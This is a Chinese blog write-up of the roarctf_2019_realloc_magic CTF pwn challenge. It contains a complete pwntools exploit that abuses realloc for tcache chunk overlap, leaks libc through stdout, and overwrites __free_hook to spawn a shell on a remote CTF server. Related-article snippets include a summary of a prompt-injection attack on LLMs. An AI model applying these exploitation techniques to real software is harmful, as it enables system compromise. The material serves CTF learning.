roarctf_2019_realloc_magic

已于 2022-03-04 13:45:10 修改
阅读量534 收藏 2
点赞数 1
分类专栏: buuctf 题目 文章标签: 安全 pwn web安全
于 2022-03-04 13:44:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123274441
版权
本文介绍了在Roarctf_2019比赛中利用realloc函数的特性进行堆块重叠(tcacheattack)的技巧,通过stdout泄露libc,并利用这些漏洞获取shell。着重讲解了攻击步骤和关键操作,如利用realloc的内存调整和内存释放特性进行战术布局。
摘要由CSDN通过智能技术生成

roarctf_2019_realloc_magic

查看保护
在这里插入图片描述
在这里插入图片描述
这里的话不会清空指针。
在这里插入图片描述
最有意思的是这个地方,使用的一个realloc。

  • 当ptr == nullptr的时候,相当于malloc(size), 返回分配到的地址
  • 当ptr != nullptr && size == 0的时候,相当于free(ptr),返回空指针
  • 当size小于原来ptr所指向的内存的大小时,直接缩小,返回ptr指针。被削减的那块内存会被释放,放入对应的bins中去
  • 当size大于原来ptr所指向的内存的大小时,如果原ptr所指向的chunk后面又足够的空间,那么直接在后面扩容,返回ptr指针;如果后面空间不足,先释放ptr所申请的内存,然后试图分配size大小的内存,返回分配后的指针
    在这里插入图片描述
    这个函数只有一次的ptr清0机会
    攻击思路:首先有realloc这种分配方法,所以可以借助realloc来达成堆块重叠,也就是tcache attack。将fd改为_IO_2_1_stdout这里,然后通过stdout来泄露出Libc。这里笔者就不详细讲如何使用stdout来泄露libc了。这里贴一个笔者之前写过的stdout泄露libc。z1r0’s blog
    拿到libc之后得到hook和one_gadget。接着重复上面的tcache attack的步骤将fd劫持成hook。最后通过realloc的特性改成gadget即可getshell。
    注意:打远程需要爆破。因为stdout的最后一个是0x60是因定的只需要爆破倒数第二个就可以了。
from pwn import *

context(arch='amd64', os='linux') #, log_level='debug')

file_name = './z1r0'
'''
debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)
'''
elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '>> '

def add(size, content):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Size?', str(size))
    r.sendafter('Content?', content)

def delete():
    r.sendlineafter(menu, '2')

def ba():
    r.sendlineafter(menu, '666')

'''
size == 0 && ptr != NULL   delete
ptr == NULL                 malloc(size)
size > old_size             edit(size > old_size)
'''

def attack():
    add(0x30, '\x00')
    add(0, '')  #free

    add(0x80, '\x00')
    add(0, '')  #free

    add(0x40, '\x00')
    add(0, '')  #free

    add(0x80, '\x00')

    for i in range(7):
        delete()

    add(0, '')  #free to get unstortedbin

    add(0x30, '\x00')

    libc = ELF('./2.27/libc-2.27.so')
    _IO_2_1_stdout_s = libc.sym['_IO_2_1_stdout_']
    #p1 = p64(0) * 7 + p64(0x51) + p64(0x7ffff7dd0760)
    p1 = p64(0) * 7 + p64(0x51) + p8(0x60) + p8(0x87)
    add(0x50, p1)
    add(0, '') #free

    add(0x80, '\x00')
    add(0, '') #free

    p1 = p64(0x0FBAD1887) + p64(0) * 3 + p8(0x58)
    add(0x80, p1)

    r.recvuntil('\n')
    #addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
    libc_base = u64(r.recv(6).ljust(8, b'\x00')) - 0x3E82A0
    if libc_base >> 40 != 0x7F:
      exit(0)
    #libc_base = addr - libc.sym['_IO_file_jumps']
    free_hook = libc_base + libc.sym['__free_hook']
    success('free_hook = ' + hex(free_hook))

    one = [0x4f2c5, 0x4f322, 0x10a38c]
    one_gadget = one[1] + libc_base

    ba()

    add(0x10, b'\x00')
    add(0, '')

    add(0x100, '\x00')
    add(0, '')

    add(0x20, '\x00')
    add(0, '')

    add(0x100, '\x00')

    for i in range(7):
        delete()

    add(0, '')
    add(0x10, '\x00')

    p2 = p64(0) * 3 + p64(0x51) + p64(free_hook)
    add(0x50, p2)
    add(0, '')

    add(0x100, '\x00')
    add(0, '')

    add(0x100, p64(one_gadget))

    delete()
    #dbg()

while True:
    try:
        r = remote('node4.buuoj.cn', 29344)
        attack()
        r.interactive()
        break
    except:
        r.close()

在这里插入图片描述

pwnroarctf_2019_realloc_magic
Nothing
03-05 1049
例行检查 保护全开,分析程序逻辑。发现没有输出堆内容的函数,想要泄露libc地址只能通过修改IO_FILE结构体实现。realloc函数有两个trick。在size为0时,free掉指针指向的堆块,返回0;在分配超过当前指针指向堆块大小时如果有剩余空间则扩大堆块大小。 利用思路 1.堆块free 8次放进unsortbin中,在fd上得到arena地址,通过realloc扩大堆块的特性造成堆块堆叠...
【BUUCTFroarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 2145
realloc好题
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 2024
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
roarctf_2019_realloc_magicrealloc,IO_file_leak,doublefree)
m0_51251108的博客
11-07 318
roarctf_2019_realloc_magic: 保护全开 逆向分析: 主界面: re: fr: ba:
roarctf_2019_realloc_magic 详细学习理解 无show()利用IO_FILE输出+realloc分配实现
weixin_46521144的博客
07-20 793
roarctf_2019_realloc_magic 这道题从头到尾都是我的知识盲区… 爆破,IO_FILE,realloc 学习资料 利用IO_FILE泄露libc原理 IO_FILE泄露libc例题 wp参考 realloc重要知识 静态分析 可以看出程序只有对realloc的调用操作,只有add()和delete()没有泄露函数。一般堆题如果没有show()函数,plt里面也没有system,可以采用的方法是劫持IO_FILE泄露。 IO_FILE劫持思路 对于劫持IO_FILE的思路,我的理解是
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 823
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
pwnroarctf_2019_easy_pwn
Nothing
12-24 2133
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
gyctf_2020_borrowstack
qq_42728977的博客
04-12 579
栈迁移,这个有点坑。 参考: https://www.cnblogs.com/luoleqi/p/12348341.html
buuctf刷题(2)【13题 - 】
像初雪一样自由洒落
05-16 421
not_the_same_3dsctf_2016 一开始看到这两个函数,直接栈溢出,跳过来不就行了,,,没注意看,get_secret,是指将flag读入了f14g,并没有打印出来呢,所以我们还需要自己打印一下 搜了一下,有write函数,那就调用它 #coding=utf-8 from pwn import * connect = 1#连接本地 fileName=''#文件名 port='node3.buuoj.cn'#端口 ip='29206'#IP地址 main_addr = 0x
buuctf realloc _IO_2_1_stdout_泄露libc地址 32位格式化字符串 UAF diff SSH SCP jmp-rsp orw seccomp_tools
carol2358的博客
08-01 779
文章目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic 贴几个链接: https://blog.csdn.net/weixin_44145820/article/details/105585889 https://blog.csdn.net/seaaseesa/article/details/105590591 https://blog.csdn.net/weixin_42151611/article/details/99228675 exp:
Roar CTF 2019 坦克大战 Writeup
Secz的博客
10-15 2154
下载压缩包 解压看到 可知该游戏由Unity3D编写,由于没有相关逆向经验,上网查阅得知游戏代码部分都在Assembly-CSharp.dll文件中,通过dnspy可以打开此类型的dll. 直接查看跟题目相关的函数,在MapManager下有名为WinGame的函数.源码如下 // MapManager // Token: 0x06000029 RID: 41 RVA: 0x00003050 ...
栈帧劫持的一些利用方法及注意事项--buuctf--gyctf_2020_borrowstack
PLpa的博客
07-01 601
前言 最近在刷buuctf时发现了很多栈帧劫持的题目,从中取出最有代表性的、坑最多的拿出来写一篇博客记录一下。 保护机制 64位Linux程序,只开了NX保护。 解题思路 IDA看伪代码 伪代码分析 从代码中我们可以看到,read读入buf的字节大小只多了0x10,这样是不能构成ROP链的,但是我们发现,程序下面给了我们一个bank的bss段的地址,这不就是典型的劫持栈帧到bss段吗? 但是这里有一个坑: 我们可以看到got.plt距离bss段非常近,而bank又正好是在0x601080的位置,当我们
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3063
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
【论文速读】| F2A:一种利用伪装安全检测智能体进行提示注入的创新方法
m0_73736695的博客
11-11 573
这篇论文研究了大语言模型(LLMs)在内容安全检测领域的广泛应用,尤其是其与安全检测代理结合后的盲目信任问题。作者提出了一种称为"伪造代理攻击"(Feign Agent Attack, F2A)的新型攻击手段,通过伪造的安全检测结果绕过LLM的防御机制,进而让LLM输出有害内容。
windows二进制安全零基础(二)
最新发布
zhuqiyua的博客
11-15 455
在x86架构中,栈(Stack)是一个非常重要的内存区域,它用于支持线程的短期数据需求,如函数调用、局部变量存储和程序控制信息。
等保测评怎么做?具体流程是什么?
weixin_59571541的博客
11-14 562
等保是指对信息系统进行等级化保护管理,目的是提高信息系统的安全性,防止信息泄露、篡改、破坏等安全问题。在哈尔滨进行等保测评的具体流程大致是:需求分析与准备、自评、选择测评机构、现场评估、问题整改、编写报告、报告审核与备案、持续改进。2.选择等保等级:根据系统的性质、重要性、涉及的敏感信息等,选择合适的等保等级(从1级到5级)。1.明确测评范围:首先需要确定需要进行等保测评的系统范围,包括硬件、软件、网络架构等。3.准备工作:准备相关的文档资料,包括系统架构图、设备清单、安全管理规程、系统开发/运营情况等。
等保二级需要哪些安全设备?
bocco的博客
11-15 306
同时,还应加强安全管理措施的实施,提高员工的安全意识和能力,共同维护企业的信息安全。这些设备能够实时监测机房内的温湿度、漏水情况,一旦超出预设范围,便会自动报警,及时采取措施,确保服务器在适宜的环境中稳定运行。1. 防火墙:防火墙是网络安全的第一道屏障,能够控制进出网络的数据包,防止未经授权的访问和恶意攻击。在等保二级中,应部署下一代防火墙,其不仅具备传统防火墙的功能,还集成了入侵防御、防病毒等功能,能够更有效地保护服务器的安全。通过部署日志审计系统,可以及时发现并处理网络中的异常行为,提高网络的安全性。
FileLink跨网文件安全摆渡系统——企业数据流转的安全桥梁
weixin_44264342的博客
11-11 1007
随着企业信息化建设的不断推进,跨网文件传输的需求日益增长,FileLink跨网文件安全摆渡系统通过全方位的安全保障与高效传输能力,成为企业解决跨网文件传输难题的理想选择。无论是对数据的加密保护、权限管理、合规审计,还是对传输效率的优化,FileLink都能够提供全面的解决方案,确保文件在内外网之间的安全、高效流转。如果您的企业正面临跨网文件传输的挑战,不妨选择FileLink,让它成为您企业数据流转的安全桥梁,助力企业信息流通的高效性和安全性,为您的业务发展保驾护航。
安全见闻5
2401_86628519的博客
11-11 358
定义:模拟人类智能的技术和科技,使计算机系统执行通常需要人类智能完成的任务。关键能力:学习、推理、解决问题、自然语言理解、图像和语音识别。算法:模拟人类思考的方式。
cJSON internal_realloc
09-16
cJSON内部并没有提供internal_realloc函数。在cJSON的内存管理中,它使用了标准库stdlib.h的malloc()、free()和realloc()函数来进行动态内存管理。你提到的cJSON_New_Item函数是cJSON中用于创建节点指针的内部构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值